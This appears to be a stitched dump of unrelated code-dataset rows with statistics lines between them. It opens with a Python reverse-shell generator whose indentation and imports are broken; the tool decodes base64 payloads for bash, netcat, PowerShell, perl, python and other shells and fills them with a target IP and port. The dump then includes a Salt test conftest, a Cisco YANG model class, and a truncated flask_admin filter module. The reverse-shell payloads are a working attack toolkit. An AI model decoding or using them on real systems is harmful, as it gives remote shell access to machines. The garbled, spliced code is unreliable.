#Python program to print
#colored text and background
# Python program to print
# colored text and background
def prRed(skk): print("\033[91m {}\033[00m" .format(skk))
def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))
def prYellow(skk): print("\033[93m {}\033[00m" .format(skk))
def prLightPurple(skk): print("\033[94m {}\033[00m" .format(skk))
def prPurple(skk): print("\033[95m {}\033[00m" .format(skk))
def prCyan(skk): print("\033[96m {}\033[00m" .format(skk))
def prLightGray(skk): print("\033[97m {}\033[00m" .format(skk))
def prBlack(skk): print("\033[98m {}\033[00m" .format(skk))
prCyan ("A.K.A thelinuxuser-choice, ")
prYellow ("Subodha Prabash")
prGreen ("Coded with python")
prRed ("you can get reverse shell cheat-sheet")
prGreen ("help me there is pull requests")
banner = r'''
░░░░░░███████ ]▄▄▄▄▄▄▄▄
▂▄▅█████████▅▄▃▂
I███████████████████].
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤...
'''
prCyan(banner)
from time import sleep
import sys
line_1 = "|This is coded by me donot copy this code without giving me credits |"
for x in line_1:
print(x, end='')
sys.stdout.flush()
sleep(0.1)
prRed("thelinuxuser-choice :")
#progress bar this hash tags are for noobs with love
#need alive_progress
from alive_progress import alive_bar
import time
mylist = [1,2]
with alive_bar(len(mylist)) as bar:
for i in mylist:
bar()
time.sleep(1)
#usage prints
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip", type=str, help="IP address", dest='ipaddr')
parser.add_argument("-p", "--port", type=int, help="Port number", dest='portnum')
parser.add_argument("-t", "--type", type=str, help="Type of the reverse shell to generate", dest='type')
parser.add_argument("-l", "--list", action="store_true", help="List all available shell types", dest='list')
parser.add_argument("-a", "--all", action="store_true", help="Generate all the shells", dest='all')
# got this from here https://stackoverflow.com/a/47440202
args = parser.parse_args(args=None if sys.argv[1:] else ['--help'])
shell_dict = {
"bash" : ['YmFzaCAtaSA+JiAvZGV2L3RjcC97MH0vezF9IDA+JjE=', 'MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC97MH0vezF9OyBzaCA8JjE5NiA+JjE5NiAyPiYxOTY='],
"perl" : ['cGVybCAtZSAndXNlIFNvY2tldDskaT0iezB9IjskcD17MX07c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe3tvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9fTsn',
'cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCJ7MH06ezF9Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3N5c3RlbSRfIHdoaWxlPD47Jw==',
'Tk9URTogV2luZG93cyBvbmx5CnBlcmwgLU1JTyAtZSAnJGM9bmV3IElPOjpTb2NrZXQ6OklORVQoUGVlckFkZHIsInswfTp7MX0iKTtTVERJTi0+ZmRvcGVuKCRjLHIpOyR+LT5mZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGU8Pjsn'],
"ruby" : ['cnVieSAtcnNvY2tldCAtZSdmPVRDUFNvY2tldC5vcGVuKCJ7MH0iLHsxfSkudG9faTtleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgPCYlZCA+JiVkIDI+JiVkIixmLGYsZikn',
'cnVieSAtcnNvY2tldCAtZSAnZXhpdCBpZiBmb3JrO2M9VENQU29ja2V0Lm5ldygiezB9IiwiezF9Iik7d2hpbGUoY21kPWMuZ2V0cyk7SU8ucG9wZW4oY21kLCJyIil7e3xpb3xjLnByaW50IGlvLnJlYWR9fWVuZCc=',
'Tk9URTogV2luZG93cyBvbmx5CnJ1YnkgLXJzb2NrZXQgLWUgJ2M9VENQU29ja2V0Lm5ldygiezB9IiwiezF9Iik7d2hpbGUoY21kPWMuZ2V0cyk7SU8ucG9wZW4oY21kLCJyIil7e3xpb3xjLnByaW50IGlvLnJlYWR9fWVuZCc='],
"golang" : ['ZWNobyAncGFja2FnZSBtYWluO2ltcG9ydCJvcy9leGVjIjtpbXBvcnQibmV0IjtmdW5jIG1haW4oKXt7YyxfOj1uZXQuRGlhbCgidGNwIiwiezB9OnsxfSIpO2NtZDo9ZXhlYy5Db21tYW5kKCIvYmluL3NoIik7Y21kLlN0ZGluPWM7Y21kLlN0ZG91dD1jO2NtZC5TdGRlcnI9YztjbWQuUnVuKCl9fScgPiAvdG1wL3QuZ28gJiYgZ28gcnVuIC90bXAvdC5nbyAmJiBybSAvdG1wL3QuZ28='],
"netcat" : ['bmMgLWUgL2Jpbi9zaCB7MH0gezF9', 'bmMgLWUgL2Jpbi9iYXNoIHswfSB7MX0=', 'bmMgLWMgYmFzaCB7MH0gezF9', 'Tk9URTogT3BlbkJTRApybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyB7MH0gezF9ID4vdG1wL2Y='],
"ncat" : ['bmNhdCB7MH0gezF9IC1lIC9iaW4vYmFzaA==', 'bmNhdCAtLXVkcCB7MH0gezF9IC1lIC9iaW4vYmFzaA=='],
"powershell" : ['cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCJ7MH0iLHsxfSk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7ezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiAgPSAkc2VuZGJhY2sgKyAiUFMgIiArIChwd2QpLlBhdGggKyAiPiAiOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX19OyRjbGllbnQuQ2xvc2UoKQ==',
'cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCd7MH0nLHsxfSk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7ezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfX07JGNsaWVudC5DbG9zZSgpIg=='],
"awk" : ['YXdrICdCRUdJTiB7e3MgPSAiL2luZXQvdGNwLzAvezB9L3sxfSI7IHdoaWxlKDQyKSB7eyBkb3t7IHByaW50ZiAic2hlbGw+IiB8JiBzOyBzIHwmIGdldGxpbmUgYzsgaWYoYyl7eyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfX0gfX0gd2hpbGUoYyAhPSAiZXhpdCIpIGNsb3NlKHMpOyB9fX19JyAvZGV2L251bGw='],
"lua" : ['Tk9URTogTGludXggb25seQpsdWEgLWUgInJlcXVpcmUoJ3NvY2tldCcpO3JlcXVpcmUoJ29zJyk7dD1zb2NrZXQudGNwKCk7dDpjb25uZWN0KCd7MH0nLCd7MX0nKTtvcy5leGVjdXRlKCcvYmluL3NoIC1pIDwmMyA+JjMgMj4mMycpOyI=',
'bHVhNS4xIC1lICdsb2NhbCBob3N0LCBwb3J0ID0gInswfSIsIHsxfSBsb2NhbCBzb2NrZXQgPSByZXF1aXJlKCJzb2NrZXQiKSBsb2NhbCB0Y3AgPSBzb2NrZXQudGNwKCkgbG9jYWwgaW8gPSByZXF1aXJlKCJpbyIpIHRjcDpjb25uZWN0KGhvc3QsIHBvcnQpOyB3aGlsZSB0cnVlIGRvIGxvY2FsIGNtZCwgc3RhdHVzLCBwYXJ0aWFsID0gdGNwOnJlY2VpdmUoKSBsb2NhbCBmID0gaW8ucG9wZW4oY21kLCAiciIpIGxvY2FsIHMgPSBmOnJlYWQoIiphIikgZjpjbG9zZSgpIHRjcDpzZW5kKHMpIGlmIHN0YXR1cyA9PSAiY2xvc2VkIiB0aGVuIGJyZWFrIGVuZCBlbmQgdGNwOmNsb3NlKCkn'],
"java" : ['ciA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpO3AgPSByLmV4ZWMoWyIvYmluL3NoIiwiLWMiLCJleGVjIDU8Pi9kZXYvdGNwL3swfS97MX07Y2F0IDwmNSB8IHdoaWxlIHJlYWQgbGluZTsgZG8gXCRsaW5lIDI+JjUgPiY1OyBkb25lIl0gYXMgU3RyaW5nW10pO3Aud2FpdEZvcigpOw=='],
"socat" : ['c29jYXQgZXhlYzonYmFzaCAtbGknLHB0eSxzdGRlcnIsc2V0c2lkLHNpZ2ludCxzYW5lIHRjcDp7MH06ezF9', 'c29jYXQgdGNwLWNvbm5lY3Q6e306e30gc3lzdGVtOi9iaW4vc2g='],
"nodejs" : ['KGZ1bmN0aW9uKCl7e3ZhciBuZXQ9cmVxdWlyZSgibmV0IiksY3A9cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLHNoPWNwLnNwYXduKCIvYmluL3NoIixbXSk7dmFyIGNsaWVudD1uZXcgbmV0LlNvY2tldCgpO2NsaWVudC5jb25uZWN0KHsxfSwiezB9IixmdW5jdGlvbigpe3tjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO319KTtyZXR1cm4gL2EvO319KSgpOw=='],
"telnet" : ['cm0gLWYgL3RtcC9wOyBta25vZCAvdG1wL3AgcCAmJiB0ZWxuZXQgezB9IHsxfSAwL3RtcC9w'],
"python" : ['cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiezB9Iix7MX0pKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOyc=', 'Tk9URTogUHl0aG9uMwpweXRob24zIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiezB9Iix7MX0pKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOyc=']
}
if args.ipaddr or args.portnum != None:
ip = args.ipaddr
port = args.portnum
else:
ip = '10.0.0.1'
port = 1234
if args.type:
prYellow('\n' + "[>]" " " + args.type + " " + "reverse shell" + " " + "[<]")
for k,v in shell_dict.items():
for i in v:
if k == args.type:
x = base64.b64decode(i).decode('utf-8')
prPurple('\n' + x.format(ip, port))
if args.list:
prRed('\n' + "[>] Available Shells [<]\n")
for k,v in shell_dict.items():
prYellow(k.capitalize())
if args.all:
from sty import fg, bg, ef, rs
prGreen('\n' + "[>] Generated All Shells [<]")
for k,v in shell_dict.items():
for i in v:
x = base64.b64decode(i).decode('utf-8')
print(bg.black + fg(201)+'\n'+ x.format(ip, port) + bg.rs +fg.rs)
#color
#highlight
from sty import fg, bg, ef, rs
bar = bg.blue + 'Thank you!' + bg.rs
print(bar)
#- Reverse Shells From -
#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
#http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
| 47.886555 | 743 | 0.759059 | 788 | 11,397 | 11.013959 | 0.392132 | 0.006452 | 0.010139 | 0.013826 | 0.047817 | 0.030073 | 0.030073 | 0.016592 | 0.006452 | 0.006452 | 0 | 0.094195 | 0.155129 | 11,397 | 237 | 744 | 48.088608 | 0.799772 | 0.112135 | 0 | 0.146154 | 0 | 0 | 0.629935 | 0.543345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069231 | false | 0 | 0.092308 | 0 | 0.161538 | 0.084615 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8c62aa566fbde5492bba59a6c11c2b33b87a6089 | 1,002 | py | Python | tests/integration/factories/cli/conftest.py | danielrobbins/pytest-salt-factories | 9c9dc882628f6ddb93dab88bf548755d2196cec9 | [
"Apache-2.0"
] | null | null | null | tests/integration/factories/cli/conftest.py | danielrobbins/pytest-salt-factories | 9c9dc882628f6ddb93dab88bf548755d2196cec9 | [
"Apache-2.0"
] | null | null | null | tests/integration/factories/cli/conftest.py | danielrobbins/pytest-salt-factories | 9c9dc882628f6ddb93dab88bf548755d2196cec9 | [
"Apache-2.0"
] | null | null | null | """
tests.integration.factories.cli.conftest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import pytest
@pytest.fixture(scope="package")
def master_id():
return "integration-cli-master"
@pytest.fixture(scope="package")
def minion_id():
return "integration-cli-minion"
@pytest.fixture(scope="package")
def salt_master(salt_factories, master_id):
"""
This fixture just configures and starts a salt-master.
"""
config_overrides = {"open_mode": True}
factory = salt_factories.get_salt_master_daemon(master_id, config_overrides=config_overrides)
with factory.started():
yield factory
@pytest.fixture(scope="package")
def salt_minion(salt_factories, minion_id, salt_master):
"""
This fixture just configures and starts a salt-minion.
"""
factory = salt_master.get_salt_minion_daemon(minion_id)
with factory.started():
yield factory
@pytest.fixture(scope="package")
def salt_cli(salt_master):
return salt_master.get_salt_cli()
| 23.857143 | 97 | 0.695609 | 123 | 1,002 | 5.439024 | 0.268293 | 0.104634 | 0.134529 | 0.186846 | 0.433483 | 0.349776 | 0.301943 | 0.301943 | 0.185351 | 0.185351 | 0 | 0 | 0.150699 | 1,002 | 41 | 98 | 24.439024 | 0.786134 | 0.190619 | 0 | 0.428571 | 0 | 0 | 0.113842 | 0.056921 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238095 | false | 0 | 0.047619 | 0.142857 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
8c651d22173586246287ff7a070395391804c0f6 | 14,899 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_fretta_grid_svr_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_fretta_grid_svr_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_fretta_grid_svr_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """ Cisco_IOS_XR_fretta_grid_svr_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR fretta\-grid\-svr package operational data.
This module contains definitions
for the following management objects\:
grid\: GRID operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Grid(Entity):
"""
GRID operational data
.. attribute:: nodes
Table of nodes
**type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes>`
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid, self).__init__()
self._top_entity = None
self.yang_name = "grid"
self.yang_parent_name = "Cisco-IOS-XR-fretta-grid-svr-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("nodes", ("nodes", Grid.Nodes))])
self._leafs = OrderedDict()
self.nodes = Grid.Nodes()
self.nodes.parent = self
self._children_name_map["nodes"] = "nodes"
self._segment_path = lambda: "Cisco-IOS-XR-fretta-grid-svr-oper:grid"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid, [], name, value)
class Nodes(Entity):
"""
Table of nodes
.. attribute:: node
Operational data for a particular node
**type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node>`
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes, self).__init__()
self.yang_name = "nodes"
self.yang_parent_name = "grid"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("node", ("node", Grid.Nodes.Node))])
self._leafs = OrderedDict()
self.node = YList(self)
self._segment_path = lambda: "nodes"
self._absolute_path = lambda: "Cisco-IOS-XR-fretta-grid-svr-oper:grid/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes, [], name, value)
class Node(Entity):
"""
Operational data for a particular node
.. attribute:: node_name (key)
Node ID
**type**\: str
**pattern:** ([a\-zA\-Z0\-9\_]\*\\d+/){1,2}([a\-zA\-Z0\-9\_]\*\\d+)
.. attribute:: client_xr
GRID Client Table
**type**\: :py:class:`ClientXr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.ClientXr>`
.. attribute:: clients
GRID Client Consistency Check
**type**\: :py:class:`Clients <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.Clients>`
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes.Node, self).__init__()
self.yang_name = "node"
self.yang_parent_name = "nodes"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['node_name']
self._child_classes = OrderedDict([("client-xr", ("client_xr", Grid.Nodes.Node.ClientXr)), ("clients", ("clients", Grid.Nodes.Node.Clients))])
self._leafs = OrderedDict([
('node_name', (YLeaf(YType.str, 'node-name'), ['str'])),
])
self.node_name = None
self.client_xr = Grid.Nodes.Node.ClientXr()
self.client_xr.parent = self
self._children_name_map["client_xr"] = "client-xr"
self.clients = Grid.Nodes.Node.Clients()
self.clients.parent = self
self._children_name_map["clients"] = "clients"
self._segment_path = lambda: "node" + "[node-name='" + str(self.node_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-fretta-grid-svr-oper:grid/nodes/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes.Node, ['node_name'], name, value)
class ClientXr(Entity):
"""
GRID Client Table
.. attribute:: client
GRID Client Database
**type**\: list of :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.ClientXr.Client>`
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes.Node.ClientXr, self).__init__()
self.yang_name = "client-xr"
self.yang_parent_name = "node"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("client", ("client", Grid.Nodes.Node.ClientXr.Client))])
self._leafs = OrderedDict()
self.client = YList(self)
self._segment_path = lambda: "client-xr"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes.Node.ClientXr, [], name, value)
class Client(Entity):
"""
GRID Client Database
.. attribute:: client_name (key)
Client name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: client_data
Client information
**type**\: list of :py:class:`ClientData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.ClientXr.Client.ClientData>`
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes.Node.ClientXr.Client, self).__init__()
self.yang_name = "client"
self.yang_parent_name = "client-xr"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['client_name']
self._child_classes = OrderedDict([("client-data", ("client_data", Grid.Nodes.Node.ClientXr.Client.ClientData))])
self._leafs = OrderedDict([
('client_name', (YLeaf(YType.str, 'client-name'), ['str'])),
])
self.client_name = None
self.client_data = YList(self)
self._segment_path = lambda: "client" + "[client-name='" + str(self.client_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes.Node.ClientXr.Client, ['client_name'], name, value)
class ClientData(Entity):
"""
Client information
.. attribute:: res_id
Resource ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes.Node.ClientXr.Client.ClientData, self).__init__()
self.yang_name = "client-data"
self.yang_parent_name = "client"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('res_id', (YLeaf(YType.uint32, 'res-id'), ['int'])),
])
self.res_id = None
self._segment_path = lambda: "client-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes.Node.ClientXr.Client.ClientData, ['res_id'], name, value)
class Clients(Entity):
"""
GRID Client Consistency Check
.. attribute:: client
GRID Client Consistency Check
**type**\: list of :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.Clients.Client>`
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes.Node.Clients, self).__init__()
self.yang_name = "clients"
self.yang_parent_name = "node"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("client", ("client", Grid.Nodes.Node.Clients.Client))])
self._leafs = OrderedDict()
self.client = YList(self)
self._segment_path = lambda: "clients"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes.Node.Clients, [], name, value)
class Client(Entity):
"""
GRID Client Consistency Check
.. attribute:: client_name (key)
Client name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: client_data
Client information
**type**\: list of :py:class:`ClientData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.Clients.Client.ClientData>`
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes.Node.Clients.Client, self).__init__()
self.yang_name = "client"
self.yang_parent_name = "clients"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['client_name']
self._child_classes = OrderedDict([("client-data", ("client_data", Grid.Nodes.Node.Clients.Client.ClientData))])
self._leafs = OrderedDict([
('client_name', (YLeaf(YType.str, 'client-name'), ['str'])),
])
self.client_name = None
self.client_data = YList(self)
self._segment_path = lambda: "client" + "[client-name='" + str(self.client_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes.Node.Clients.Client, ['client_name'], name, value)
class ClientData(Entity):
"""
Client information
.. attribute:: res_id
Resource ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'fretta-grid-svr-oper'
_revision = '2015-11-09'
def __init__(self):
super(Grid.Nodes.Node.Clients.Client.ClientData, self).__init__()
self.yang_name = "client-data"
self.yang_parent_name = "client"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('res_id', (YLeaf(YType.uint32, 'res-id'), ['int'])),
])
self.res_id = None
self._segment_path = lambda: "client-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Grid.Nodes.Node.Clients.Client.ClientData, ['res_id'], name, value)
def clone_ptr(self):
self._top_entity = Grid()
return self._top_entity
| 37.814721 | 169 | 0.471441 | 1,379 | 14,899 | 4.775925 | 0.096447 | 0.049195 | 0.059217 | 0.056787 | 0.800486 | 0.773763 | 0.698148 | 0.666262 | 0.666262 | 0.665503 | 0 | 0.013251 | 0.422579 | 14,899 | 393 | 170 | 37.910941 | 0.752296 | 0.1782 | 0 | 0.619565 | 0 | 0 | 0.092986 | 0.015133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103261 | false | 0 | 0.027174 | 0 | 0.195652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4fbb0a2e350edc2f3b9bebc0899305ef16c85f16 | 7,873 | py | Python | venv/lib/python2.7/site-packages/flask_admin/contrib/mongoengine/filters.py | MarioAer/BubblesData | 849cc6428b5e8d64f5517f94a714e3f737bfc75d | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/flask_admin/contrib/mongoengine/filters.py | MarioAer/BubblesData | 849cc6428b5e8d64f5517f94a714e3f737bfc75d | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/flask_admin/contrib/mongoengine/filters.py | MarioAer/BubblesData | 849cc6428b5e8d64f5517f94a714e3f737bfc75d | [
"MIT"
] | null | null | null | import datetime
from flask_admin.babel import lazy_gettext
from flask_admin.model import filters
from .tools import parse_like_term
from mongoengine.queryset import Q
class BaseMongoEngineFilter(filters.BaseFilter):
"""
Base MongoEngine filter.
"""
def __init__(self, column, name, options=None, data_type=None):
"""
Constructor.
:param column:
Model field
:param name:
Display name
:param options:
Fixed set of options. If provided, will use drop down instead of textbox.
:param data_type:
Client data type
"""
super(BaseMongoEngineFilter, self).__init__(name, options, data_type)
self.column = column
# Common filters
class FilterEqual(BaseMongoEngineFilter):
def apply(self, query, value):
flt = {'%s' % self.column.name: value}
return query.filter(**flt)
def operation(self):
return lazy_gettext('equals')
class FilterNotEqual(BaseMongoEngineFilter):
def apply(self, query, value):
flt = {'%s__ne' % self.column.name: value}
return query.filter(**flt)
def operation(self):
return lazy_gettext('not equal')
class FilterLike(BaseMongoEngineFilter):
def apply(self, query, value):
term, data = parse_like_term(value)
flt = {'%s__%s' % (self.column.name, term): data}
return query.filter(**flt)
def operation(self):
return lazy_gettext('contains')
class FilterNotLike(BaseMongoEngineFilter):
def apply(self, query, value):
term, data = parse_like_term(value)
flt = {'%s__not__%s' % (self.column.name, term): data}
return query.filter(**flt)
def operation(self):
return lazy_gettext('not contains')
class FilterGreater(BaseMongoEngineFilter):
def apply(self, query, value):
flt = {'%s__gt' % self.column.name: value}
return query.filter(**flt)
def operation(self):
return lazy_gettext('greater than')
class FilterSmaller(BaseMongoEngineFilter):
def apply(self, query, value):
flt = {'%s__lt' % self.column.name: value}
return query.filter(**flt)
def operation(self):
return lazy_gettext('smaller than')
class FilterEmpty(BaseMongoEngineFilter, filters.BaseBooleanFilter):
def apply(self, query, value):
if value == '1':
flt = {'%s' % self.column.name: None}
else:
